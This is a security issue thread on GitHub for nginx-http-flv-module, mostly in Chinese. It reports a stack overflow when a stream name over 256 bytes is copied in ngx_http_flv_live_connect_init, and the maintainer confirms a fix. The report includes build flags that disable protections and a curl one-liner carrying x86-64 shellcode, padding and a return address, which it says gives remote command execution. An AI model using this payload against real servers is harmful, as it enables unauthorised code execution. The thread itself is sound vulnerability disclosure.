search

winshining / nginx-http-flv-module

A media streaming server based on nginx-rtmp-module. In addtion to the features nginx-rtmp-module provides, HTTP-FLV, GOP cache, VHosts (one IP for multi domain names) and JSON style statistics are supported now.
BSD 2-Clause "Simplified" License
2.75k stars 571 forks source link

[security] Potential stack overflow in `ngx_http_flv_live_connect_init` #170

Closed wupco closed 4 years ago

wupco commented 4 years ago

漏洞点

ngx_memcpy(name, stream->data, stream->len);

name 定义为 u_char name[NGX_RTMP_MAX_NAME]; // #define NGX_RTMP_MAX_NAME 256, 如果stream 超过256字节,就会导致栈溢出

Configuration file / 配置文件

worker_processes  1;

error_log  logs/error.log debug;

events {
    worker_connections  1024;
}

rtmp {
    publish_notify on;
    server {
        listen 1935;
        on_connect http://127.0.0.1:8080/connect;
        application live {
            live on;
        }

       application pppo {
            live on;
       } 
    }
}

http {
    server {
        listen      8080;

    location /live {
          flv_live on;
        }
    location /connect {
            return 302 pppo;
        }

    }
}

Steps to reproduce the behavior / 复现问题步骤

关闭保护机制编译可造成远程任意命令执行。

cd /src/nginx/; \
    ./auto/configure \
        --user=www-data \
        --group=www-data \
        --add-module=/src/nginx-http-flv-module \
        --with-cc-opt="-fno-stack-protector -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=0" \
        --with-ld-opt="-z norelro -no-pie -z execstack" \
        --with-threads\
        --with-http_ssl_module; \
    make; \
    make install;

exploit (shellcode+padding+addr([jmp rsi]))

 echo -e "http://127.0.0.1:8080/live\?app\=live\&stream\=j\xff_H\x89\xe6jAH\xff\xc7j4XH\x89\xe2\x0f\x05\x85\xc0u\xf1H\x89\xfdj\x03^H\xff\xcex\x0bVj\!XH\x89\xef\x0f\x05\xeb\xefjhH\xb8/bin///sPH\x89\xe7hri\x01\x01\x814$\x01\x01\x01\x011\xf6Vj\x08^H\x01\xe6VH\x89\xe61\xd2j;X\x0f\x05CCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDLLLLLL\x9d\x8e\x42" | xargs curl -vv

没有关闭保护机制可造成DoS漏洞

winshining commented 4 years ago

@wupco 非常感谢指出问题,bug已经修复,顺带修复其他两处可能存在相同问题的地方。